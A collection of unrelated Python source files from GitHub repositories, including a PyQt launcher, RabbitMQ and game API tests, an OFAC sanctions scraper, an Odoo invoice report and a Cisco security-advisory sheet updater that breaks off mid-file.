utf-8 *-*\n\n\"\"\"\nThis file is part of DLComix.\n\n DLComix is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n DLComix is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with DLComix. 
If not, see .\n\n\"\"\"\n\n\"\"\"\nInit of software\nDefine the application and call DLComix Class\nDefine locale language and use English by default\n\"\"\"\n\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nimport dlcomix, sys\n\ndef main(args):\n a = QApplication(args)\n locale = QLocale.system().name()\n qtTranslator = QTranslator()\n if qtTranslator.load(\"qt_\"+locale):\n a.installTranslator(qtTranslator)\n appTranslator = QTranslator()\n if appTranslator.load(\"LOCALE/DLCOMIX_\"+locale+\".qm\"):\n a.installTranslator(appTranslator)\n else:\n appTranslator.load(\"LOCALE/DLCOMIX_en_US\")\n a.installTranslator(appTranslator)\n fenetre = dlcomix.DLComix()\n fenetre.show()\n r=a.exec_()\n return r\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"Freeculturexx/DLComix","sub_path":"dlcomix/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"73200710666","text":"import json\nimport random\n\nimport pika\n\n# import time\n\n\ndef send_report_messages():\n credentials = pika.PlainCredentials(\"guest\", \"guest\")\n parameters = pika.ConnectionParameters(\"localhost\", 5700, \"/\", credentials)\n connection = pika.BlockingConnection(parameters)\n channel = connection.channel()\n channel.queue_declare(queue=\"data_feed\", durable=True)\n\n body = {\"ask\": 10049, \"bid\": 9983, \"security_id\": \"MSFT\", \"timestamp\": \"1685104715\"}\n message = json.dumps({\"message_type\": \"price\", \"body\": body})\n channel.basic_publish(\n exchange=\"financial_exchange\",\n routing_key=\"data_feed\",\n body=message,\n properties=pika.BasicProperties(delivery_mode=2),\n )\n print(f\"Sent message: {message}\")\n\n connection.close()\n\n\nif __name__ == \"__main__\":\n send_report_messages()\n","repo_name":"christian-spooner/stock-exchange-simulation","sub_path":"test-scripts/rabbitmq/test_price_messages.py","file_name":"test_price_messages.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"72348018824","text":"from CAP_Personality_Class import CAP_P\r\nfrom CAP_Art_Class import CAP_A\r\nimport time\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n The program executes the conversation which\r\n will use the values produced to create an\r\n abstract drawing using turtles.\r\n\r\n :return: None\r\n \"\"\"\r\n\r\n cap_p = CAP_P()\r\n\r\n cap_p.start_convo()\r\n cap_p.dogs_and_cats()\r\n start = cap_p.start_pos()\r\n loop = cap_p.ask_age()\r\n multiplier = cap_p.age_num_multiplier()\r\n side_a = cap_p.fake_guessing_game_low()\r\n side_b = cap_p.fake_guessing_game_high()\r\n length = cap_p.ask_height()\r\n color = cap_p.ask_fav_color()\r\n cap_p.end_convo()\r\n\r\n time.sleep(3)\r\n\r\n cap_a = CAP_A(start, loop * multiplier, side_a, side_b, length, color)\r\n cap_a.create_art()\r\n\r\n\r\nmain()\r\n","repo_name":"TMGWill/CAP-Project","sub_path":"CAP.exe.py","file_name":"CAP.exe.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21425085445","text":"import numpy as np\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import preprocessing\n\n\ndef plot_corr(column_name, color_col_name, gi_usda_df, pic_name, title, range=0.005):\n print(gi_usda_df[column_name].value_counts())\n 
print(\"-------------------------------------------------\")\n max_index = gi_usda_df[column_name].idxmax()\n max_in_col = gi_usda_df[column_name].values[max_index]\n\n bins_values = np.arange(0, max_in_col, range)\n labels_values = np.arange(0, len(bins_values) - 1, 1)\n gi_usda_df['log_values'] = \"\"\n gi_usda_df['log_values'] = np.log(gi_usda_df[column_name])\n gi_usda_df['log_values'] += 6\n gi_usda_df[color_col_name] = \"\"\n gi_usda_df[color_col_name] = pd.cut(gi_usda_df['log_values'], bins=bins_values, labels=labels_values)\n\n # gi_usda_df[color_col_name] = gi_usda_df[column_name].fillna(max_in_col)\n gi_usda_df = gi_usda_df[pd.notnull(gi_usda_df[color_col_name])]\n\n color_arr = gi_usda_df[color_col_name]\n\n x = gi_usda_df['Carbohydrt_(g)']\n y = gi_usda_df['GI Value']\n plt.figure(figsize=(17, 12))\n\n plt.scatter(x=x, y=y, c=color_arr, cmap='gist_stern', s=75)\n font = {'family': 'serif',\n 'color': 'black',\n 'weight': 'normal',\n 'size': 25,\n }\n plt.title(title, fontdict=font)\n font = {'color': 'black',\n 'weight': 'bold',\n 'size': 18,\n }\n plt.xlabel(\"Carbohydrt\", fontdict=font)\n plt.ylabel(\"GI Value\", fontdict=font)\n plt.xticks(fontsize=15)\n plt.yticks(fontsize=15)\n cbar = plt.colorbar()\n\n # cbar.ax.tick_params(labelsize=15)\n cbar.set_ticks([])\n cbar.set_label(column_name, weight='bold', size=18)\n\n if not os.getcwd().__contains__(\"Graphs & Photos\"):\n os.chdir(os.getcwd()[:os.getcwd().index(\"Excel_files\")] + \"Graphs & Photos\")\n plt.savefig(pic_name + '.png')\n","repo_name":"NoaOr/GI-Project","sub_path":"Plot_Graphs/carbo_vs_GI.py","file_name":"carbo_vs_GI.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"39718984754","text":"\"\"\"\nAs it is Tushar's Birthday on March 1st, he decided to throw a party to all his friends at TGI Fridays in Pune. Given are the eating capacity of each friend, filling capacity of each dish and cost of each dish. A friend is satisfied if the sum of the filling capacity of dishes he ate is equal to his capacity. Find the minimum cost such that all of Tushar's friends are satisfied (reached their eating capacity).\nNOTE:\nEach dish is supposed to be eaten by only one person. 
Sharing is not allowed.\nEach friend can take any dish unlimited number of times.\nThere always exists a dish with filling capacity 1 so that a solution always exists.\n\"\"\"\n#dp[id][capacity] = cost\n\nclass Solution:\n #@param A : list of int -> eating capacity\n #@param B : list of int -> filing capacity\n #@param C : list of int -> cost\n #@return int -> total cost\n def solve(self, A, B, C):\n mc = max(A)\n dp = [[0 for i in range(mc + 1)] for i in range(len(B) + 1)]\n\n for j in range(1, mc + 1):\n dp[0][j] = 99\n \n for i in range(1, len(B) + 1):\n for j in range(1, mc + 1):\n if j - B[i - 1] >= 0:\n dp[i][j] = min(dp[i - 1][j], dp[i][j - B[i - 1]] + C[i - 1])\n else:\n dp[i][j] = dp[i - 1][j]\n \n tc = 0\n for c in A:\n tc+= dp[i][c]\n return tc\n\nA = [2, 4, 6]\nB = [2, 1, 3]\nC = [2, 5, 3]\nt = Solution()\nprint(t.solve(A, B, C))","repo_name":"anurag5398/DSA-Problems","sub_path":"DynamicProgramming/Knapsack/TusharBdayParty.py","file_name":"TusharBdayParty.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39235962886","text":"from django.http import HttpResponseRedirect\nfrom algoritmos import settings\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport requests\nimport pypyodbc\nimport datetime\nimport json\nimport csv\nimport os\n\nconnStr = (r\"DRIVER={Microsoft Access Driver (*.mdb, *.accdb)};DBQ=\\\\Grupofux\\prestamos clientes\\FINANCIERA UNIVERSAL XPRESS\\COTIZACIONES\\GRUPO_FUX_COTIZADOR\\Archivo\\GFUX_DWH.accdb;\")\n\n# connStr = (\n# r\"DRIVER={Microsoft Access Driver (*.mdb, *.accdb)};DBQ=\"\n# + os.path.join(settings.BASE_DIR, \"GFUX_DWH.accdb\")\n# + \";\"\n# )\n\n\ndef getToken():\n r = []\n r = requests.get(\"https://sanctionssearch.ofac.treas.gov/\")\n soup = BeautifulSoup(r.text, \"html.parser\")\n table = soup.find(id=\"__VIEWSTATE\")[\"value\"]\n data = {\"token\": table}\n\n with open(\"ofactoken.json\", \"w\") as write_file:\n json.dump(data, write_file)\n return False\n\n\ndef logout(request):\n response = HttpResponseRedirect(\"/\")\n response.delete_cookie(\"username\")\n return response\n\n\ndef verificareporte(username, idinsert):\n conn = pypyodbc.connect(connStr)\n cur = conn.cursor()\n query = \"SELECT id FROM tbl_ofac_reportes where id=\" + idinsert\n cur.execute(query)\n row = cur.fetchall()\n if len(row) == 0:\n conn2 = pypyodbc.connect(connStr)\n cur2 = conn2.cursor()\n query = (\n \"insert into tbl_ofac_reportes(id,usuario) values (\"\n + idinsert\n + \",'\"\n + username\n + \"');\"\n )\n cur2.execute(query)\n cur2.commit()\n cur2.close()\n conn2.close()\n cur.close()\n conn.close()\n return len(row)\n\n\ndef searchName(name, skip):\n token = \"\"\n with open(\"ofactoken.json\") as json_file:\n data = json.load(json_file)\n token = data[\"token\"]\n r = []\n r = requests.post(\n \"https://sanctionssearch.ofac.treas.gov/\",\n data={\n \"ctl00_ctl03_HiddenField\": \";;AjaxControlToolkit, Version=3.5.40412.0, Culture=neutral\",\n \"__EVENTTARGET\": \"\",\n \"__EVENTARGUMENT\": \"\",\n \"__VIEWSTATE\": token,\n \"__VIEWSTATEGENERATOR\": \"CA0B0334\",\n \"ctl00$MainContent$ddlType\": \"\",\n \"ctl00$MainContent$txtAddress\": \"\",\n \"ctl00$MainContent$txtLastName\": name,\n \"ctl00$MainContent$txtCity\": \"\",\n \"ctl00$MainContent$txtID\": \"\",\n \"ctl00$MainContent$txtState\": \"\",\n \"ctl00$MainContent$lstPrograms\": \"\",\n \"ctl00$MainContent$ddlCountry\": \"\",\n \"ctl00$MainContent$ddlList\": \"\",\n 
\"ctl00$MainContent$Slider1\": \"85\",\n \"ctl00$MainContent$Slider1_Boundcontrol\": \"85\",\n \"ctl00$MainContent$btnSearch\": \"Search\",\n },\n )\n\n soup = BeautifulSoup(r.text, \"html.parser\")\n rsdata = []\n table = soup.find(id=\"gvSearchResults\")\n\n if table is not None:\n idcount = 1\n for link in table.find_all(\"tr\"):\n newdata = []\n linkofac = link.a\n actialid = 0\n if linkofac is not None:\n actialid = linkofac.get(\"href\").split(\"=\")[1]\n newdata.append(actialid)\n if int(actialid) not in skip:\n for item in link.find_all(\"td\"):\n newdata.append(item.get_text().strip())\n newdata.append(\"{}~{}\".format(idcount, actialid))\n idcount = idcount + 1\n rsdata.append(newdata)\n\n return rsdata\n\n\ndef updateUserSearch(idcompara):\n conn2 = pypyodbc.connect(connStr)\n cur2 = conn2.cursor()\n query = (\n \"update tbl_ofac_clients_search set status=1 where tbl_ofac_clients_search.id = \"\n + idcompara\n )\n cur2.execute(query)\n cur2.commit()\n cur2.close()\n conn2.close()\n\n\ndef updateUserWithData(data, idcompara):\n conn2 = pypyodbc.connect(connStr)\n cur2 = conn2.cursor()\n query = \"update tbl_ofac_clients_search set data='{}', status=1 where tbl_ofac_clients_search.id = {}\".format(\n data.replace(\"'\", \"\"), idcompara\n )\n cur2.execute(query)\n cur2.commit()\n cur2.close()\n conn2.close()\n\ndef updateUserReviewed( idcompara):\n conn2 = pypyodbc.connect(connStr)\n cur2 = conn2.cursor()\n query = \"update tbl_ofac_clients_search set revisado=1 where tbl_ofac_clients_search.id = {}\".format(\n idcompara\n )\n cur2.execute(query)\n cur2.commit()\n cur2.close()\n conn2.close()\n\n\ndef downloadfile():\n try:\n sdn = []\n alt = {}\n name = datetime.datetime.now().strftime(\"%d-%m-%Y\")\n urlsdn = \"https://www.treasury.gov/ofac/downloads/sdn.csv\"\n urlalt = \"https://www.treasury.gov/ofac/downloads/alt.csv\"\n urllib.request.urlretrieve(\n urlsdn, os.path.join(settings.BASE_DIR, \"static/data/sdn-\" + name + \".csv\")\n )\n urllib.request.urlretrieve(\n urlalt, os.path.join(settings.BASE_DIR, \"static/data/alt-\" + name + \".csv\")\n )\n\n with open(\"static/data/alt-\" + name + \".csv\", newline=\"\") as csvfile:\n spamreader = csv.reader(csvfile)\n for row in spamreader:\n if not row[0] in alt:\n alt[row[0]] = [row]\n else:\n alt[row[0]].append(row)\n\n with open(\"static/data/sdn-\" + name + \".csv\", newline=\"\") as csvfile:\n spamreader = csv.reader(csvfile)\n for row in spamreader:\n akadato = []\n if row[0] in alt:\n akadato = alt[row[0]]\n item = {\"data\": row, \"aka\": akadato}\n sdn.append(item)\n\n with open(\"data.json\", \"w\") as write_file:\n json.dump(sdn, write_file)\n except:\n pass\n","repo_name":"joelcld05/algoritmos","sub_path":"app/utils/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40173505818","text":"class Solution:\n def productExceptSelf(self, nums: List[int]) -> List[int]:\n start, end, n = 1, 1, len(nums)\n result = [1]*n \n\n for i in range(n):\n result[i] *= start\n start *= nums[i]\n result[~i] *= end\n end *= nums[~i]\n\n return result\n\n \n \n# https://zhenyu0519.github.io/2020/02/25/lc238/\n\n# init start end and n values where n = len of nums\n\n# init result array of ones(len(nums))\n\n# loop as long as n\n\n# result at i multiplies by start\n\n# start multiplies by nums at i\n\n# result at (-i)-1 multiplies by end\n\n# end multiplies by nums at 
(-i)-1\n\n\n","repo_name":"LukeFlaherty/interviewPrep","sub_path":"productExceptSelf.py","file_name":"productExceptSelf.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72150326984","text":"from lxml import etree\nfrom odoo import models\nimport re\n\nclass GenericInvoiceReport(models.AbstractModel):\n _name = 'report.ccu_l10n_cl_edi.generic_invoice_report'\n\n def _get_tax_amount(self, tax_group_id, info):\n amount = 0\n for tax in info:\n if tax_group_id == tax[6]:\n amount = tax[1]\n break\n return amount\n\n def get_docids(self, docids):\n return docids\n\n def _get_report_values(self, docids, data=None):\n docids = self.get_docids(docids)\n\n report_obj = self.env['ir.actions.report']\n report = report_obj._get_report_from_name('ccu_l10n_cl_edi.account_invoice_report')\n doc = []\n record = self.env['account.move'].browse(docids)\n doc.append(record)\n doc_extra = {}\n for rec in record:\n printing_config = self.env['fiscal.dte.printing.config'].search(\n [('company_id', '=', rec.company_id.id)])\n doc_extra[rec.id] = {}\n doc_extra[rec.id]['subtotal_values'] = ['0.0', '10.0', '19.0', '20.5', '20.5', '31.5', '0.0', '19.0']\n doc_extra[rec.id]['subtotal_values'] = []\n doc_extra[rec.id]['subtotal_values'].append(rec.amount_untaxed)\n doc_extra[rec.id]['is_voucher_document'] = \"0\"\n if rec.l10n_latam_document_type_id.code == '39':\n doc_extra[rec.id]['is_voucher_document'] = \"1\"\n else:\n doc_extra[rec.id]['is_voucher_document'] = \"0\"\n for ref_rec in rec.l10n_cl_reference_ids:\n found = False\n # print(ref_rec, ref_rec, ref_rec.l10n_cl_reference_doc_type_selection)\n if ref_rec.l10n_cl_reference_doc_type_selection == '39' and not found:\n doc_extra[rec.id]['is_voucher_document'] = \"1\"\n found = True\n if ref_rec.l10n_cl_reference_doc_type_selection == '61' and not found:\n origin_doc = rec.env['account.move'].search([]).filtered(lambda inv: inv.l10n_latam_document_number == ref_rec.origin_doc_number)\n for ref_orig_rec in origin_doc:\n if ref_orig_rec and ref_orig_rec.l10n_latam_document_type_id.code == '39' and not found:\n doc_extra[rec.id]['is_voucher_document'] = \"1\"\n found = True\n if printing_config:\n tax_6 = self._get_tax_amount(printing_config.tax_6_id.id, list(rec.amount_by_group))\n doc_extra[rec.id]['subtotal_values'].append(\n self._get_tax_amount(printing_config.tax_1_id.id, list(rec.amount_by_group)))\n doc_extra[rec.id]['subtotal_values'].append(\n self._get_tax_amount(printing_config.tax_2_id.id, list(rec.amount_by_group)))\n doc_extra[rec.id]['subtotal_values'].append(\n self._get_tax_amount(printing_config.tax_3_id.id, list(rec.amount_by_group)))\n doc_extra[rec.id]['subtotal_values'].append(\n self._get_tax_amount(printing_config.tax_4_id.id, list(rec.amount_by_group)))\n doc_extra[rec.id]['subtotal_values'].append(\n self._get_tax_amount(printing_config.tax_5_id.id, list(rec.amount_by_group)))\n doc_extra[rec.id]['subtotal_values'].append(rec.amount_total - tax_6)\n doc_extra[rec.id]['subtotal_values'].append(tax_6)\n doc_extra[rec.id]['vat_total'] = tax_6\n else:\n doc_extra[rec.id]['subtotal_values'].append(0)\n doc_extra[rec.id]['subtotal_values'].append(0)\n doc_extra[rec.id]['subtotal_values'].append(0)\n doc_extra[rec.id]['subtotal_values'].append(0)\n doc_extra[rec.id]['subtotal_values'].append(0)\n doc_extra[rec.id]['subtotal_values'].append(rec.amount_total)\n doc_extra[rec.id]['subtotal_values'].append(0)\n doc_extra[rec.id]['vat_total'] = 
0\n\n ted = record._l10n_cl_get_dte_barcode_xml()\n ted_groups = re.search(\"(?P.*)\\.*\", ted.get('ted', ''), flags=re.DOTALL)\n ted_xml = etree.XML(ted_groups.group('ted'))\n ted_string_list = etree.tostring(ted_xml, encoding='utf-8').decode().split(\"\\n\")\n ted_string = ''.join([x.strip() for x in ted_string_list])\n doc_extra[rec.id]['pdf417'] = rec._pdf417_barcode(ted_string)\n if rec.pos_order_ids:\n pos_order = self.env['pos.order'].browse(rec.pos_order_ids[0].id)\n stock_picking = self.env['stock.picking'].search([('pos_order_id', '=', pos_order.id)])\n if pos_order.payment_ids:\n payment_form = pos_order.payment_ids[0].payment_method_id.name\n doc_extra[rec.id]['payment_form'] = payment_form\n else:\n doc_extra[rec.id]['payment_form'] = \"-\"\n doc_extra[rec.id]['pos_order'] = pos_order\n doc_extra[rec.id]['stock_picking'] = stock_picking\n else:\n doc_extra[rec.id]['payment_form'] = ''\n doc_extra[rec.id]['pos_order'] = ''\n doc_extra[rec.id]['stock_picking'] = ''\n\n # print([\"EXTRA\", doc_extra])\n\n docargs = {\n 'doc_ids': docids,\n 'doc_model': report.model,\n 'docs': doc,\n 'docs_extra': doc_extra\n }\n return docargs","repo_name":"marcobustamanteab/odoo-pos","sub_path":"src/custom-addons/ccu_l10n_cl_edi/report/generic_invoice_report.py","file_name":"generic_invoice_report.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70821207946","text":"from typing import List, Optional\n\nimport pytest\nimport requests\nfrom requests import Response\n\nfrom app.models.game import Game\nfrom app.schemas import game_schema\nfrom app.schemas.game_schema import (\n Action, DoActionRequest,\n SeeEventCardOptionsPayload, UseEventCardPayload,\n ForceAnotherPlayerToChooseCardPayload\n)\n\n\nclass BaseGameTestCase:\n @pytest.fixture(autouse=True)\n def _setup(self, client, game: Game, auth_header_generator):\n self.client = client\n self.game = game\n self.auth_header = auth_header_generator\n\n @property\n def do_action_url(self):\n return \"api/v1/game/action\"\n\n @property\n def my_game_url(self):\n return \"api/v1/game/my-game\"\n\n def _start_call_for_action(self):\n request = {\n \"game_id\": \"1\",\n \"action\": {\n \"actionType\": \"call for an attack\",\n \"actionData\": None\n },\n \"payload\": None\n }\n headers = self.auth_header(self.game.get_jr_caption())\n self.client.post(\n self.do_action_url, json=request, headers=headers\n )\n\n def _vote(self, player: str) -> requests.Response:\n request = {\n \"gameId\": self.game.id,\n \"action\": {\n \"actionType\": \"vote\",\n },\n \"payload\": {\n \"voteCardIndex\": 0\n }\n }\n headers = self.auth_header(player)\n response = self.client.post(\n self.do_action_url, headers=headers, json=request\n )\n return response\n\n def _call_for_an_attack(self, player: str):\n request = {\n \"game_id\": \"1\",\n \"action\": {\n \"actionType\": \"call for an attack\",\n \"actionData\": None\n },\n \"payload\": None\n }\n\n headers = self.auth_header(player)\n response = self.client.post(\n self.do_action_url, json=request, headers=headers\n )\n return response\n\n def _maroon_crew(self, captain: str, player: str) -> Response:\n request = {\n \"gameId\": \"1\",\n \"action\": {\n \"actionType\": \"maroon any crew mate to tortuga\",\n },\n \"payload\": {\n \"crewToMaroon\": player\n }\n }\n headers = self.auth_header(captain)\n response = self.client.post(\n self.do_action_url, json=request, headers=headers\n )\n return response\n\n def 
_move_action(self, player_to_move: str,\n position: game_schema.Positions) -> Response:\n request = {\n \"gameId\": 1,\n \"action\": {\n \"actionType\": \"move\",\n },\n \"payload\": {\n \"move_where\": position\n }\n }\n\n headers = self.auth_header(player_to_move)\n return self.client.post(url=self.do_action_url, json=request,\n headers=headers)\n\n def _move_treasure_action(self,\n player: str,\n from_hold: game_schema.TreasureHoldTeams):\n json = {\n \"gameId\": \"1\",\n \"action\": {\n \"actionType\": \"move treasure\",\n },\n \"payload\": {\n \"from_hold\": from_hold\n }\n }\n\n headers = self.auth_header(player)\n return self.client.post(url=self.do_action_url, json=json,\n headers=headers)\n\n def _call_brawl_action(self, player: str) -> Response:\n request = {\n \"gameId\": \"1\",\n \"action\": {\n \"actionType\": \"call for brawl\"\n }\n }\n\n headers = self.auth_header(player)\n return self.client.post(url=self.do_action_url, json=request,\n headers=headers)\n\n def _call_for_mutiny_action(self, player: str) -> Response:\n request = {\n \"gameId\": \"1\",\n \"action\": {\n \"actionType\": \"call for a mutiny\"\n },\n }\n headers = self.auth_header(player)\n return self.client.post(url=self.do_action_url, json=request,\n headers=headers)\n\n def _view_two_event_cards_action(self, player, event_cards: List[int]):\n request = {\n \"gameId\": 1,\n \"action\": {\n \"actionType\": \"view two event cards\"\n },\n \"payload\": {\n \"eventCardsIndexes\": event_cards\n }\n }\n headers = self.auth_header(player)\n return self.client.post(url=self.do_action_url, json=request,\n headers=headers)\n\n def _reveal_event_card_action(self, player, index):\n request = {\n \"gameId\": 1,\n \"action\": {\n \"actionType\": \"reveal one event card\",\n },\n \"payload\": {\n \"event_card_index\": index\n }\n }\n headers = self.auth_header(player)\n return self.client.post(url=self.do_action_url, json=request,\n headers=headers)\n\n def _keep_event_card_action(self, player):\n request = DoActionRequest(\n action=Action(\n action_type=Action.ActionType.KEEP_EVENT_CARD,\n ),\n game_id=\"1\",\n )\n headers = self.auth_header(player)\n return self.client.post(url=self.do_action_url, data=request.json(),\n headers=headers)\n\n def use_event_card_action(self, player, slug: str,\n option: Optional[int] = None):\n payload = UseEventCardPayload(\n event_card_to_use=slug,\n )\n if option is not None:\n payload.event_card_option_index = option\n\n request = DoActionRequest(\n action=Action(\n action_type=Action.ActionType.USE_EVENT_CARD\n ),\n game_id=\"1\",\n payload=payload\n )\n headers = self.auth_header(player)\n return self.client.post(self.do_action_url, data=request.json(),\n headers=headers)\n\n def force_another_player_to_choose_card(self,\n other_player: str,\n player: str,\n event_card_indexes: List[int]):\n payload = ForceAnotherPlayerToChooseCardPayload(\n forced_player=other_player,\n event_cards_indexes=event_card_indexes\n )\n request = DoActionRequest(\n action=Action(\n action_type=Action.ActionType.FORCE_ANOTHER_PLAYER_TO_CHOOSE_CARD\n ),\n game_id=\"1\",\n payload=payload\n )\n headers = self.auth_header(player)\n return self.client.post(\n self.do_action_url, data=request.json(), headers=headers\n )\n\n def _get_my_game(self, player) -> Response:\n headers = self.auth_header(player)\n response = self.client.get(self.my_game_url, headers=headers)\n return 
response\n","repo_name":"Glyphack/tortuga","sub_path":"app/tests/api/game/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7201,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"32759196173","text":"import os\nimport configparser\nimport logging\nimport logging.handlers as handlers\nimport sys\nimport json\nimport csv\nfrom datetime import date, timedelta\nfrom time import time\nimport gspread\nimport requests\n\nlogger = logging.getLogger(\"botsheet\")\nlogger.setLevel(logging.DEBUG)\nlogHandler = handlers.RotatingFileHandler(\n r\".\\logs\\debug.log\", maxBytes=5600, backupCount=2\n)\nlogHandler.setLevel(logging.DEBUG)\nlogFormatter = logging.Formatter(\n \"%(asctime)s [%(levelname)s] %(message)s\", \"%Y-%m-%d %H:%M:%S\"\n)\nstdHandler = logging.StreamHandler(sys.stdout)\nlogHandler.setFormatter(logFormatter)\nstdHandler.setFormatter(logFormatter)\nlogger.addHandler(stdHandler)\n\nKEY = \"CI\"\nenviron = os.getenv(KEY, default=\"LOCAL\")\n\nif environ == \"true\":\n psirt_grant = \"client_credentials\"\n psirt_client_id = os.environ[\"psirt_client_id\"]\n psirt_client_secret = os.environ[\"psirt_client_secret\"]\n sa = gspread.service_account(\"service_account.json\")\nelse:\n config = configparser.ConfigParser()\n config.read(\"config.ini\")\n psirt_grant = config[\"PSIRT\"][\"grant_type\"]\n psirt_client_id = config[\"PSIRT\"][\"client_id\"]\n psirt_client_secret = config[\"PSIRT\"][\"client_secret\"]\n sa = gspread.service_account()\n logger.addHandler(logHandler)\n\nlogger.info(\"Trying to open PSIRTs Google Sheet\")\ntry:\n sh = sa.open(\"PSIRTs\")\nexcept gspread.exceptions.APIError(response) as e:\n print(type(e))\n print(e)\nwks = sh.worksheet(\"Last7\")\n\nsh_14 = sa.open(\"PSIRT-14\")\nwks_14 = sh_14.worksheet(\"Last14\")\n\nsh_30 = sa.open(\"PSIRT-30\")\nwks_30 = sh_30.worksheet(\"Last30\")\n\n\ndef recent_update_7(verify_cve_date):\n \"\"\"Determines if CVE entry has been updated in last 7 days\n\n Args:\n verify_cve_date (string): yyyy-mm-ddThh:mm:ss\n\n Returns:\n bool: True if entry has been updated in last 7 days\n \"\"\"\n t_index = verify_cve_date.index(\"T\")\n stripped_date = verify_cve_date[:t_index:]\n split_date = tuple(stripped_date.split(\"-\"))\n new_date = date(int(split_date[0]), int(split_date[1]), int(split_date[2]))\n seven_days = date.today() - timedelta(days=7)\n recent = seven_days < new_date\n return recent\n\n\ndef recent_update_14(verify_cve_date):\n \"\"\"Determines if CVE entry has been updated in last 14 days\n\n Args:\n verify_cve_date (string): yyyy-mm-ddThh:mm:ss\n\n Returns:\n bool: True if entry has been updated in last 14 days\n \"\"\"\n t_index = verify_cve_date.index(\"T\")\n stripped_date = verify_cve_date[:t_index:]\n split_date = tuple(stripped_date.split(\"-\"))\n new_date = date(int(split_date[0]), int(split_date[1]), int(split_date[2]))\n fourteen_days = date.today() - timedelta(days=14)\n recent = fourteen_days < new_date\n return recent\n\n\ndef recent_update_30(verify_cve_date):\n \"\"\"Determines if CVE entry has been updated in last 30 days\n\n Args:\n verify_cve_date (string): yyyy-mm-ddThh:mm:ss\n\n Returns:\n bool: True if entry has been updated in last 30 days\n \"\"\"\n t_index = verify_cve_date.index(\"T\")\n stripped_date = verify_cve_date[:t_index:]\n split_date = tuple(stripped_date.split(\"-\"))\n new_date = date(int(split_date[0]), int(split_date[1]), int(split_date[2]))\n thirty_days = date.today() - timedelta(days=30)\n recent = 
thirty_days < new_date\n return recent\n\n\ndef psirt_otoken(\n psirt_f_grant, psirt_f_client_id, psirt_f_client_secret\n): # psirt_grant, psirt_client_id, psirt_client_secret\n \"\"\"This function creates the OAuth token\n\n Args:\n grant (str): Token grant type\n (https://raw.githubusercontent.com/api-at-cisco/Images/master/Token_Access.pdf)\n client_id (str): API username\n client_secret (str): API password\n\n Returns:\n access_token (str): Access token\n token_type (str): Token type (\"Bearer\")\n token_dies (time): When token expires\n \"\"\"\n\n otoken_url = (\n f\"https://cloudsso.cisco.com/as/token.oauth2?grant_type={psirt_f_grant}\"\n f\"&client_id={psirt_f_client_id}&client_secret={psirt_f_client_secret}\"\n )\n\n try:\n otoken_response = requests.request(\"POST\", otoken_url)\n otoken_response.raise_for_status()\n except requests.HTTPError:\n otoken_status = otoken_response.status_code\n if otoken_status == 401:\n logging.error(\"Invalid API key.\")\n elif otoken_status == 404:\n logging.error(\"Invalid input.\")\n elif otoken_status in (429, 443):\n logging.error(\"API calls per minute exceeded.\")\n elif otoken_status == 400:\n logging.error(\"API bad request.\")\n sys.exit(1)\n\n otoken_data = otoken_response.json()\n\n otoken_access_token = otoken_data[\"access_token\"]\n otoken_token_type = otoken_data[\"token_type\"]\n otoken_token_expires = otoken_data[\"expires_in\"]\n\n otoken_token_dies = time() + (otoken_token_expires - 120)\n\n return (otoken_access_token, otoken_token_type, otoken_token_dies)\n\n\n# Get OAUTH\notoken_token, otoken_type, otoken_expiry = psirt_otoken(\n psirt_grant, psirt_client_id, psirt_client_secret\n)\n\nlogger.info(\"------------------------------------------------------\")\n\n# Begin of PSIRT request\n\nTODAY = date.today()\nTODAY_STR = str(TODAY)\nDELTA = timedelta(days=90)\nNINETY_DAYS = TODAY - DELTA\nNINETY_DAYS_STR = str(NINETY_DAYS)\n\npsirt_url = (\n f\"https://api.cisco.com/security/advisories/all/firstpublished\"\n f\"?startDate={NINETY_DAYS_STR}&endDate={TODAY_STR}\"\n)\n\npsirt_token = f\"Bearer {otoken_token}\"\npsirt_headers = {\"Authorization\": psirt_token}\n\ntry:\n psirt_response = requests.request(\"GET\", psirt_url, headers=psirt_headers)\n psirt_response.raise_for_status()\nexcept requests.HTTPError:\n status = psirt_response.status_code\n if status in (401, 403):\n logger.error(\"Invalid PSIRT API key.\")\n elif status == 404:\n logger.error(\"Invalid PSIRT request input.\")\n elif status in (429, 443):\n logger.error(\"PSIRT API calls per minute exceeded.\")\n sys.exit(1)\n\npsirt_json_response = json.loads(psirt_response.text)\n\n# End of PSIRT request\n\n# Convert the PSIRT response to a CSV\n\ncve_entries = psirt_json_response[\"advisories\"]\n\nENTRY_COUNT = 1\nUPDATED_ENTRIES = 1\nG_ENTRY_COUNT = 1\nG_UPDATED_ENTRIES_7 = 